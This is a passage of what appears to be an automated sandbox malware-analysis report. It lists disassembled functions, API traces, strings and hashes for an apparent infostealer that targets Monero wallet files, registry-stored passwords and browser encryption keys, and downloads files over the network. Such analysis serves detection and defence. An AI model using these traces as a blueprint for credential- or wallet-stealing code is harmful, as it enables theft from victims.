                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 503b9ebb3012b3d3a18ebf863b2f6e4193fb315e4e2a74a54b2f0146cf9e3dc2
                                • Instruction ID: 19ce43659c56f0efc494395758cf87bc0b6e87e6dc17e2504d95681e73a7ca19
                                • Opcode Fuzzy Hash: 503b9ebb3012b3d3a18ebf863b2f6e4193fb315e4e2a74a54b2f0146cf9e3dc2
                                • Instruction Fuzzy Hash: E5511E719101589BCB1CFF60ED9AAEE77B9AF10300F546028F5067B192EF746B45CB62
                                Function 00E212D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c3f78ac3485fbb0afbb0cde9ad1bd4fd58ef5040a900161bcd3c20920d2fe7c2
                                • Instruction ID: b3d385e1af9e795b6dc94092d7a15007572dc896d3f6c46abdbdd8977dfecf82
                                • Opcode Fuzzy Hash: c3f78ac3485fbb0afbb0cde9ad1bd4fd58ef5040a900161bcd3c20920d2fe7c2
                                • Instruction Fuzzy Hash: 97C1C5B69002289BCB18EF60EC89FEA73B8BF64304F0055D9F50A77141DB74AA85CF91
                                Function 00E24280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E28DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00E242EC
                                • lstrcat.KERNEL32(?,008FDD30), ref: 00E2430B
                                • lstrcat.KERNEL32(?,?), ref: 00E2431F
                                • lstrcat.KERNEL32(?,008FCFA8), ref: 00E24333
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E28D90: GetFileAttributesA.KERNEL32(00000000,?,00E11B54,?,?,00E3564C,?,?,00E30E1F), ref: 00E28D9F
                                  • Part of subcall function 00E19CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E19D39
                                  • Part of subcall function 00E199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                  • Part of subcall function 00E199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                  • Part of subcall function 00E199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                  • Part of subcall function 00E199C0: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                  • Part of subcall function 00E199C0: LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                  • Part of subcall function 00E199C0: CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                  • Part of subcall function 00E293C0: GlobalAlloc.KERNEL32(00000000,00E243DD,00E243DD), ref: 00E293D3
                                • StrStrA.SHLWAPI(?,008FDD90), ref: 00E243F3
                                • GlobalFree.KERNEL32(?), ref: 00E24512
                                  • Part of subcall function 00E19AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19AEF
                                  • Part of subcall function 00E19AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E14EEE,00000000,?), ref: 00E19B01
                                  • Part of subcall function 00E19AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19B2A
                                  • Part of subcall function 00E19AC0: LocalFree.KERNEL32(?,?,?,?,00E14EEE,00000000,?), ref: 00E19B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E244A3
                                • StrCmpCA.SHLWAPI(?,00E308D1), ref: 00E244C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E244D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00E244E5
                                • lstrcat.KERNEL32(00000000,00E30FB8), ref: 00E244F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: 9ffbbcdf58be0babce4a6bd320f682b6c100971de00e354eaac46fe8e8bd5e10
                                • Instruction ID: f6d242e1193becf268423d4bd7c7490d5340775c5db3bfb300988d5adedf842c
                                • Opcode Fuzzy Hash: 9ffbbcdf58be0babce4a6bd320f682b6c100971de00e354eaac46fe8e8bd5e10
                                • Instruction Fuzzy Hash: 5B717AB6A00218A7CB14EBA0EC95FEE77B9BB48300F045598F605B7181EA35DB45CF91
                                Function 00E11310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E112B4
                                  • Part of subcall function 00E112A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E112BB
                                  • Part of subcall function 00E112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E112D7
                                  • Part of subcall function 00E112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E112F5
                                  • Part of subcall function 00E112A0: RegCloseKey.ADVAPI32(?), ref: 00E112FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1134F
                                • lstrlen.KERNEL32(?), ref: 00E1135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00E11377
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E28B60: GetSystemTime.KERNEL32(00E30E1A,008FA028,00E305AE,?,?,00E113F9,?,0000001A,00E30E1A,00000000,?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E28B86
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E11465
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                  • Part of subcall function 00E199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                  • Part of subcall function 00E199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                  • Part of subcall function 00E199C0: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                  • Part of subcall function 00E199C0: LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                  • Part of subcall function 00E199C0: CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00E114EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 0abcefdd94f86666a9c0488cfff2d81ff07b91eb8a9c932a9b4fcad007058736
                                • Instruction ID: 307adc5c298cd9556b9283278789bc496ae751547bf5f8c77bcc3577baf32f39
                                • Opcode Fuzzy Hash: 0abcefdd94f86666a9c0488cfff2d81ff07b91eb8a9c932a9b4fcad007058736
                                • Instruction Fuzzy Hash: 045167B295022897CB19EB60EC96FED73BCAF54300F4451A8B20A72081EE745B85CB95
                                Function 00E175D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E172D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E1733A
                                  • Part of subcall function 00E172D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E173B1
                                  • Part of subcall function 00E172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E1740D
                                  • Part of subcall function 00E172D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00E17452
                                  • Part of subcall function 00E172D0: HeapFree.KERNEL32(00000000), ref: 00E17459
                                • lstrcat.KERNEL32(00000000,00E317FC), ref: 00E17606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E17648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00E1765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E1768F
                                • lstrcat.KERNEL32(00000000,00E31804), ref: 00E176A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E176D3
                                • lstrcat.KERNEL32(00000000,00E31808), ref: 00E176ED
                                • task.LIBCPMTD ref: 00E176FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: b8f943c8710209623d71c336c71ec7195b15901cc714d8803261cd1237093fed
                                • Instruction ID: e8ce25d98c216f9f9cfc17dd32c7cf35da28ae87cafb84d753492d1bbb2fc54b
                                • Opcode Fuzzy Hash: b8f943c8710209623d71c336c71ec7195b15901cc714d8803261cd1237093fed
                                • Instruction Fuzzy Hash: 78311072A01209EBCB18EBA4DD59DFF77B5FB48301F205258F142B7185DA39A986CB60
                                Function 00E28100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008FD838,00000000,?,00E30E2C,00000000,?,00000000), ref: 00E28130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E28137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00E28158
                                • __aulldiv.LIBCMT ref: 00E28172
                                • __aulldiv.LIBCMT ref: 00E28180
                                • wsprintfA.USER32 ref: 00E281AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: da8627227f00f4c64a9fb39256138f45ab6cd7bb2bbb4bb04b45371a54e4363c
                                • Instruction ID: 1b85e091f4552492de57ab23c969a3c62b3bc1f6238f53279e7e259ed7a3ac48
                                • Opcode Fuzzy Hash: da8627227f00f4c64a9fb39256138f45ab6cd7bb2bbb4bb04b45371a54e4363c
                                • Instruction Fuzzy Hash: 232118B1A44318ABDB10DB94DD4AFAEB7B8FB44B10F204209F605BB284C77969018BA4
                                Function 00E160A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14839
                                  • Part of subcall function 00E147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14849
                                • InternetOpenA.WININET(00E30DF7,00000001,00000000,00000000,00000000), ref: 00E1610F
                                • StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E16147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E1618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E161B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00E161DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E1620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00E16249
                                • InternetCloseHandle.WININET(?), ref: 00E16253
                                • InternetCloseHandle.WININET(00000000), ref: 00E16260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 82eeb2f6910cf10002ebb75f90b966fbfcef057d9aa5e9d9044ee91e58580cfa
                                • Instruction ID: cc0f261f9bb0413e117cd40f51acb9785791b15ffa220c8d0115bf032ba93a92
                                • Opcode Fuzzy Hash: 82eeb2f6910cf10002ebb75f90b966fbfcef057d9aa5e9d9044ee91e58580cfa
                                • Instruction Fuzzy Hash: 5C518FB1A00218ABDB24DF60DC49BEE77B8FB44305F109198F606B71C0DB756A85CF95
                                Function 00E172D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E1733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E173B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E1740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E17452
                                • HeapFree.KERNEL32(00000000), ref: 00E17459
                                • task.LIBCPMTD ref: 00E17555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: 1d7897bb8bcdc267d44d18b5be600af4cd1b14e3a2a6fd163fb7d014ac4a99bc
                                • Instruction ID: b45daa58e5f169c6348de22044ad18db58a6a98b8691e2a57408c1d33e5496b5
                                • Opcode Fuzzy Hash: 1d7897bb8bcdc267d44d18b5be600af4cd1b14e3a2a6fd163fb7d014ac4a99bc
                                • Instruction Fuzzy Hash: F7615AB190422C9BDB24DB50DC55BDAB7B8BF48300F0091E9E689B6141EBB45BC9CFA0
                                Function 00E1BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                • lstrlen.KERNEL32(00000000), ref: 00E1BC9F
                                  • Part of subcall function 00E28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E1BCCD
                                • lstrlen.KERNEL32(00000000), ref: 00E1BDA5
                                • lstrlen.KERNEL32(00000000), ref: 00E1BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
